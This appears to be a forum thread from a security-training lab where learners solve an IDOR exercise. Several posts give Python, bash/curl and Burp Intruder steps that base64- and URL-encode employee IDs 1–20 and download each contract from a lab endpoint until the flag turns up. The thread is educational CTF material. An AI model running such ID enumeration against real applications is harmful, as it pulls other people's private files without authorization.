Web Attacks - Bypassing Encoded References

I need help with the exercise:

Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with ‘cat’. You can either calculate the ‘contract’ parameter value, or calculate the ‘.pdf’ file name directly.

I tried using Burp’s Decoder to try 1 to 20 numbers but I was unsuccessful. Reading the source code we can see that the value is first getting base64 encoded and then URL encoded. I was not able to create a curl command to generate the right encoded values for the numbers 1 to 20.

Any help would be greatly appreciated.

Thanks

I was able to figure it out.

I found that Burp is the easiest way to get the flag. You just need to understand that MQ%3D%3D is encoded for MQ==. This is also encoding for the number 1. It’s an encoding that we should be pretty familiar with by now. It took me longer to figure out than it should have.

1 Like

Use this simple script to convert 20 numbers to 20 base64 encoded numbers:

import base64
for number in range(1,21):
    n=str(number).encode('ascii')
    base64_bytes = base64.b64encode(n)
    base64_data = base64_bytes.decode('ascii')
    print(base64_data)

Then, go to Burp make a request for any contract on the page, intercept the traffic, send that traffic to Intruder, select a Sniper Attack, as a payload use simple list, paste base64 encoded values, and you will see that one response length is different than the others, that is flag. Feel free to PM me if you need help.

4 Likes

I was troubled by the way in which to initiate an enumeration of user identifiers for a given range in regards to the many features of BurpSuite™ until I was tutored on the appropriate use of the Payload Options™ [Numbers]™ type of payload and the necessary configurations. In other references to BurpSuite™ enumeration, the caution was in favor of the Simple List™ option.

Anyone else ignorant of which the Bash script to use or create for enumerating identifiers could find Number(s)™ to be useful by way of enabling and setting the Payload Processing™ feature to ‘Base64-encode’.

‘Add’ the ‘processing rule’ for the btoa() JavaScript encoder function by selecting the appropriate ‘rule type’. Next, start the ‘Sniper’ attack before observing the HTTP Response for the uid that matched with the HTB value during the process.

An excellent strategy which works perfectly and has prevented me from wasting time finding a way of creating a curl command with urlencoded values

1 Like

Thank you, I am glad it helped!
-Milos

Thank you very much! I was stuck on this question for almost 1 week. I would have never figured this out and would have wasted too much time.

1 Like

No problem! I am glad it helped, I appreciate the feedback!
-Milos

for anyone who wants to use bash script to solve this exercise, this is my script and it worked well.

#!/bin/bash

url="http://<IP:PORT>/download.php?contract="

for i in {1..20}; do
    for encodedid in $(echo -n $i | base64); do
        curl  "$url$encodedid" 
    done
done
2 Likes

Thank you @tabbii.
I’m not sure why I wasnt able to perforn the curl request on that exercise, even with the switch -O.
Ultimately I had to perform a dictionary attack through Burp Intruder.

for i in {1..20}; do echo -n $i | base64; done

Just paste the output into Burp Intruder and pay close attention to the length of the response.

1 Like

this is the one that worked for me. thanks

I need a little help with the script that they provided, it just downloads the ‘download.php’ with an error saying contract not defined.

Hello, everyone. I want to give two tips that would have helped me a lot to solve the challenge; one needs to adapt the curl command a bit to make the script run. Here are the two tips;

  1. Investigate the HTTP method used in the request in the lesson and in the challenge. Does it influence the flags we use?
  2. Investigate the ´-G´ flag of curl.

here is my script that fully automates and facilitates the entire process efficiently

#!/bin/bash

url="http://{IP}:{PORT}/"
for uid in {1..20}; do
    hash=$(echo -n $uid | base64 -w 0 | tr -d ' -');
    encoded_hash=$(jq -rn --arg v "$hash" '$v|@uri');
    
    check=$(curl -s -X POST "$url/download.php?contract=$encoded_hash")
    if [ "x$check" = "x" ]; then
        echo "UID $uid empty"

    else
        echo "flag found in UID $uid! saving to flag.txt..."
        echo "$check" > flag.txt
    fi
done

loops between UID’s 1 and 20, encoding the numbers to base 64, and then URL encoding them. after that, for each UID, we assign the content of the page (by curling a POST request) to a variable called ‘check’, which we then check whether it has any content written to it. if so, then the script will save the content of that page under a ‘flag.txt’ file, if not, the loop will go on until a page with content is found, in this scenario, the content is the flag.